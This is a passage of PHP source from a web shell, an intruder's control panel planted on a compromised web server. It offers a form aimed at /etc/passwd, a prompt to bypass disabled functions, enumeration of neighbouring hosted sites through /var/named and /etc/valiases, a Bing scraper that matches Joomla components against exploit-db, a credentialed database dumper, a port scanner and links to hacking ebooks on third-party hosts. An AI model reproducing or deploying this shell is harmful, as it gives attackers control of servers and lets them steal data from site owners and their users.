:</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n    <span class="style2"><strong>Simple : </strong> </span>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>\r\n    <font class="style2"><strong>/etc/passwd : </strong> </font>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>\r\n\t</strong>\r\n\t</span>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class =\'inputzbut\' type="submit" value="start">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form> \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="mendapatkan" type="hidden" value="passwd">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="foldername" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>   \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="pass" type="hidden" value="password">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="url" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>\r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info \r\n\tSecurity</strong></td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<?php\r\n$safe_mode = ini_get(\'safe_mode\');\r\nif($safe_mode==\'1\')\r\n{\r\necho \'ON\';\r\n}else{\r\necho \'OFF\';\r\n}\r\n\r\n?>\t\r\n\t</strong>\t\r\n\t</td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="matikan" type="hidden" value="sekatan">        \t\t\t\t\r\n    </strong>\r\n\r\n<?php\r\nif(\'\'==($func=@ini_get(\'disable_functions\')))\r\n{\r\necho "<font color=#00ff00>No Security for Function</font></b>";\r\n}else{\r\necho \'<script>alert("Please see below and press >Please Click Here First!<");</script>\';\r\necho "<font color=red>$func</font></b>";\r\necho \'<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>\';\r\necho \'<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">\r\n    </strong>\r\n    </td></tr>\';\r\n}\r\n?></strong></td></tr></table></table></table>\r\n<?\r\n}\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tutor\'))\r\n    {\r\n    ?>\r\n\t<form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">\r\n\t<center><br><br><b>+--=[ Tutorial & Ebook hacking ]=--+</b><br>\r\n\t\t<form method="post" action="">\r\n<table class="tabnet" border="1" >\r\n<tr>\r\n\t\t<td align="center">English</td><td align="center">Indonesian</td>\r\n\t</tr>\r\n\t<tr>\r\n\t\t<td><form method="post" action="">&nbsp;\r\n\tE-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial24" > Hacking Exposed-5 </option>\r\n\t<option value="tutorial25"> Internet Denial Of Service </option>\r\n\t<option value="tutorial26">Computer Viruses For Dummies</option>\r\n\t<option value="tutorial27">Hack Attacks Testing</option>\r\n\t<option value="tutorial28">Secrets Of A Super Hacker</option>\r\n\t<option value="tutorial29">Stealing The Network</option>\r\n\t<option value="tutorial30">Hacker\'s HandBook</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n\t</td></form>\r\n<td><form method="post" action="">&nbsp;\r\nTutorial by X\'1N73CT &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t\t<option value="tutorial2">Search Engine Hacking</option>\r\n\t\t<option value="tutorial3">SQL Injection dengan hackbar</option>\r\n\t\t<option value="tutorial1" >Bypass Union</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nE-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="cryptography_for_defeloper">Cryptography for Developer</option>\r\n\t<option value="tutorial31">Mobile Malware Attack and Defense</option>\r\n\t<option value="forensic">CD and DVD Forensic</option>\r\n\t<option value="ddd">Open Sourch Security Tools</option>\r\n\t<option value="metasploit">Metaslpoit Toolkit</option>\r\n\t<option value="stealing_network">Stealing the Network</option>\r\n\t<option value="security_polices">Creating Security Polices</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nX-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial4">X-CODE MAGAZINE 1</option>\r\n\t<option value="tutorial5">X-CODE MAGAZINE 2</option>\r\n\t<option value="tutorial6">X-CODE MAGAZINE 3</option>\r\n\t<option value="tutorial7">X-CODE MAGAZINE 4</option>\r\n\t<option value="tutorial8">X-CODE MAGAZINE 5</option>\r\n\t<option value="tutorial9">X-CODE MAGAZINE 6</option>\r\n\t<option value="tutorial10">X-CODE MAGAZINE 7</option>\r\n\t<option value="tutorial11">X-CODE MAGAZINE 8</option>\r\n\t<option value="tutorial12">X-CODE MAGAZINE 9</option>\r\n\t<option value="tutorial13">X-CODE MAGAZINE 10</option>\r\n\t<option value="tutorial14">X-CODE MAGAZINE 11</option>\r\n\t<option value="tutorial15">X-CODE MAGAZINE 12</option>\r\n\t<option value="tutorial16">X-CODE MAGAZINE 13</option>\r\n\t<option value="tutorial17">X-CODE MAGAZINE 14</option>\r\n\t<option value="tutorial18">X-CODE MAGAZINE 15</option>\r\n\t<option value="tutorial19">X-CODE MAGAZINE 16</option>\r\n\t<option value="tutorial20">X-CODE MAGAZINE 17</option>\r\n\t<option value="tutorial21">X-CODE MAGAZINE 18</option>\r\n\t<option value="tutorial22">X-CODE MAGAZINE 19</option>\r\n\t<option value="tutorial23">X-CODE MAGAZINE 20</option>\r\n\t<option value="tutorial024">X-CODE MAGAZINE 21</option>\r\n\t</select>\r\n\t<input type="submit" name="submit" class="inputzbut" value="Download" ></a>\r\n</form></td></tr></table><br><br>\r\n<?php\r\n$submit = $_POST [\'submit\'];\r\nif(isset($submit)) {\r\n\t$pilih = $_POST[\'pilih\'];\r\n\t\tif ( $pilih == \'tutorial1\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial2\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial3\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial4\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_1.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial5\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_2.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial6\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_3.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial7\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_4.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial8\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial9\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_6.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial10\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_7.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial11\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_8.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial12\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode9.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial13\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode10.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial14\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode11.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial15\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode12.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial16\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode13.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial17\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode14.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial18\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/Xcode15.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial19\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_16.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial20\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_17.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial21\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_18.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial22\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_19.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial23\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_20.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial024\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_21.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\t\r\n\t\telseif ( $pilih == \'tutorial24\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hacking_exposed_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial25\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/internet_denial_of_service.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial26\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial27\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hack_attacks_testing.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial28\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/secrets_of_super_hacker.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial29\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial30\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/webapp_hackers_handbook.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'ddd\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial31\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'cryptography_for_defeloper\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'forensic\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'metasploit\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'stealing_network\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'security_polices\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n}\r\n\r\n}\r\n////////////////////////////////////////////////////////////////////\r\n\r\n//////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cms_detect\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">\r\n\t<br><br><br><br><center><b><font size=4>+--=[ CMS Detector ]=--+</font></b></center><br><br>\r\n    <?php\r\nif(!file_exists(\'pee.tmp\')){\r\n@fopen(\'pee.tmp\', \'w\');\r\n\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>\';\r\n\r\n$p = 0;\r\n\r\nif(is_readable("/var/named")){\r\n$list = scandir("/var/named");\r\n$current_dir = posix_getcwd();\r\n$dir = explode("/",$current_dir);\r\nforeach($list as $domain){\r\nif(strpos($domain,".db"))\r\n{\r\n\t$domain = str_replace(\'.db\',\'\',$domain);\r\n\t$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));\r\n\t\r\nerror_reporting(0);\r\n\r\n$link = $pageURL.\'pee/\'.$owner[\'name\'];\r\n\r\ncms_add($link,$domain,$owner[\'name\'],"WordPress");\r\ncms_add($link,$domain,$owner[\'name\'],"Joomla");\r\ncms_add($link,$domain,$owner[\'name\'],"vBulletin");\r\ncms_add($link,$domain,$owner[\'name\'],"WHMCS");\r\ncms_add($link,$domain,$owner[\'name\'],"PhpBB");\r\ncms_add($link,$domain,$owner[\'name\'],"MyBB");\r\ncms_add($link,$domain,$owner[\'name\'],"IPB");\r\ncms_add($link,$domain,$owner[\'name\'],"SMF");\r\ncms_add($link,$domain,$owner[\'name\'],"Drupal");\r\ncms_add($link,$domain,$owner[\'name\'],"e107");\r\ncms_add($link,$domain,$owner[\'name\'],"Seditio");\r\ncms_add($link,$domain,$owner[\'name\'],"osCommerce");\r\n\r\n}\r\n}\r\n}\r\n}else{\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>\';\r\n$content = file_get_contents($pageURL.\'pee.tmp\');\r\necho $content;\r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jss\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">\r\n    <?php\r\n\techo \'\r\n\r\n<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>\r\n<form method="POST">\r\n        <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>\r\n</form><center>\r\n\r\n\';\r\n@set_time_limit(0);\r\n@error_reporting(E_ALL | E_NOTICE);\r\n \r\nfunction check_exploit($comxx){\r\n \r\n$link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";\r\n \r\n$result = @file_get_contents($link);\r\n \r\nif (eregi("No results",$result))  {\r\n \r\necho"<td>Not Found</td><td><a href=\'http://www.google.com/#hl=en&q=download+$comxx+joomla+extension\'>Download</a></td></tr>";\r\n \r\n}else{\r\n \r\necho"<td><a href=\'$link\'>Found</a></td><td><=</td></tr>";\r\n \r\n}\r\n}\r\n \r\nfunction check_com($url){\r\n \r\n$source = @file_get_contents($url);\r\n \r\npreg_match_all(\'{option,(.*?)/}i\',$source,$f);\r\npreg_match_all(\'{option=(.*?)(&amp;|&|")}i\',$source,$f2);\r\npreg_match_all(\'{/components/(.*?)/}i\',$source,$f3);\r\n \r\n$arz=array_merge($f2[1],$f[1],$f3[1]);\r\n \r\n$coms=array();\r\n \r\nforeach(array_unique($arz) as $x){\r\n$coms[]=$x;\r\n}\r\n \r\nforeach($coms as $comm){\r\n \r\necho "<tr><td>$comm</td>";\r\ncheck_exploit($comm);\r\n}\r\n \r\n}\r\n \r\nfunction sec($site){\r\npreg_match_all(\'{http://(.*?)(/index.php)}siU\',$site, $sites);\r\nif(eregi("www",$sites[0][0])){\r\nreturn $site=str_replace("index.php","",$sites[0][0]);\r\n}else{\r\nreturn $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));\r\n}}\r\n \r\n$npages = 50000;\r\n \r\nif ($_POST)\r\n{\r\n  $ip = trim(strip_tags($_POST[\'site\']));\r\n  $npage = 1;\r\n  $allLinks = array();\r\n \r\n \r\n   while($npage <= $npages)\r\n  {\r\n \r\n  $x=@file_get_contents(\'http://www.bing.com/search?q=ip%3A\' . $ip . \'+index.php?option=com&first=\' . $npage);\r\n \r\n \r\n        if ($x)\r\n        {\r\n                preg_match_all(\'(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU\', $x, $findlink);\r\n              \r\n                foreach ($findlink[1] as $fl)\r\n              \r\n                $allLinks[]=sec($fl);\r\n              \r\n              \r\n                $npage = $npage + 10;\r\n              \r\n                if (preg_match(\'(first=\' . $npage . \'&amp)siU\', $x, $linksuiv) == 0)\r\n                        break;                    \r\n        }\r\n      \r\n    else\r\n                break;\r\n  }\r\n \r\n \r\n$allDmns = array();\r\n \r\nforeach ($allLinks as $kk => $vv){\r\n \r\n$allDmns[] = $vv;\r\n}\r\n                      \r\necho\'<table border="1"  width=\\"80%\\" align=\\"center\\">\r\n<tr><td width=\\"30%\\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>\'.$ip.\'</b></td></tr>                    \r\n<tr><td width=\\"30%\\"><b>Sites Found&nbsp; : </b></td><td><b>\'.count(array_unique($allDmns)).\'</b></td></tr>\r\n</table>\';\r\necho "<br><br>";\r\n \r\necho\'<table border="1" width="80%" align=\\"center\\">\';\r\n \r\nforeach(array_unique($allDmns) as $h3h3){\r\n \r\necho\'<tr id=new><td><b><a href=\'.$h3h3.\'>\'.$h3h3.\'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>\';\r\n \r\ncheck_com($h3h3);\r\n \r\n}\r\n \r\necho"</table>";\r\n \r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dump\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">\r\n    <?php\r\necho $head.\'<p align="center">\';\r\necho \'\r\n<table width=371 class=tabnet >\r\n<tr><th colspan="2">Database Dump</th></tr>\r\n<tr>\r\n\t<td>Server </td>\r\n\t<td><input class="inputz" type=text name=server size=52></td></tr><tr>\r\n\t<td>Username</td>\r\n\t<td><input class="inputz" type=text name=username size=52></td></tr><tr>\r\n\t<td>Password</td>\r\n\t<td><input class="inputz" type=text name=password size=52></td></tr><tr>\r\n\t<td>DataBase Name</td>\r\n\t<td><input class="inputz" type=text name=dbname size=52></td></tr>\r\n\t<tr>\r\n\t<td>DB Type </td>\r\n\t<td><form method=post action="\'.$me.\'">\r\n\t<select class="inputz" name=method>\r\n\t\t<option  value="gzip">Gzip</option>\r\n\t\t<option value="sql">Sql</option>\r\n\t\t</select>\r\n\t<input class="inputzbut" type=submit value="  Dump!  " ></td></tr>\r\n\t</form></center></table>\';\r\nif ($_POST[\'username\'] && $_POST[\'dbname\'] && $_POST[\'method\']){\r\n$date = date("Y-m-d");\r\n$dbserver = $_POST[\'server\'];\r\n$dbuser = $_POST[\'username\'];\r\n$dbpass = $_POST[\'password\'];\r\n$dbname = $_POST[\'dbname\'];\r\n$file = "Dump-$dbname-$date";\r\n$method = $_POST[\'method\'];\r\nif ($method==\'sql\'){\r\n$file="Dump-$dbname-$date.sql";\r\n$fp=fopen($file,"w");\r\n}else{\r\n$file="Dump-$dbname-$date.sql.gz";\r\n$fp = gzopen($file,"w");\r\n}\r\nfunction write($data) {\r\nglobal $fp;\r\nif ($_POST[\'method\']==\'ssql\'){\r\nfwrite($fp,$data);\r\n}else{\r\ngzwrite($fp, $data);\r\n}}\r\nmysql_connect ($dbserver, $dbuser, $dbpass);\r\nmysql_select_db($dbname);\r\n$tables = mysql_query ("SHOW TABLES");\r\nwhile ($i = mysql_fetch_array($tables)) {\r\n    $i = $i[\'Tables_in_\'.$dbname];\r\n    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));\r\n    write($create[\'Create Table\'].";\\n\\n");\r\n    $sql = mysql_query ("SELECT * FROM ".$i);\r\n    if (mysql_num_rows($sql)) {\r\n        while ($row = mysql_fetch_row($sql)) {\r\n            foreach ($row as $j => $k) {\r\n                $row[$j] = "\'".mysql_escape_string($k)."\'";\r\n            }\r\n            write("INSERT INTO $i VALUES(".implode(",", $row).");\\n");\r\n        }\r\n    }\r\n}\r\nif ($method==\'ssql\'){\r\nfclose ($fp);\r\n}else{\r\ngzclose($fp);}\r\nheader("Content-Disposition: attachment; filename=" . $file);   \r\nheader("Content-Type: application/download");\r\nheader("Content-Length: " . filesize($file));\r\nflush();\r\n\r\n$fp = fopen($file, "r");\r\nwhile (!feof($fp))\r\n{\r\n    echo fread($fp, 65536);\r\n    flush();\r\n} \r\nfclose($fp); \r\n}\r\n\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'port-sc\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">\r\n    <?php\r\n    echo \'<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>\';\r\n    $start = strip_tags($_POST[\'start\']);\r\n    $end = strip_tags($_POST[\'end\']);\r\n    $host = strip_tags($_POST[\'host\']);\r\n    if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){\r\n    for($i = $start; $i<=$end; $i++){\r\n    $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n    if($fp){\r\n    echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n    }\r\n    flush();\r\n    }\r\n    }else{\r\n    echo \'<table class=tabnet style="width:300px;padding:0 1px;">\r\n   <input type="hidden" name="y" value="phptools">\r\n   <tr><th colspan="5">Port Scanner</th></center></tr>\r\n   <tr>\r\n\t\t<td>Host</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>\r\n   </tr>\r\n   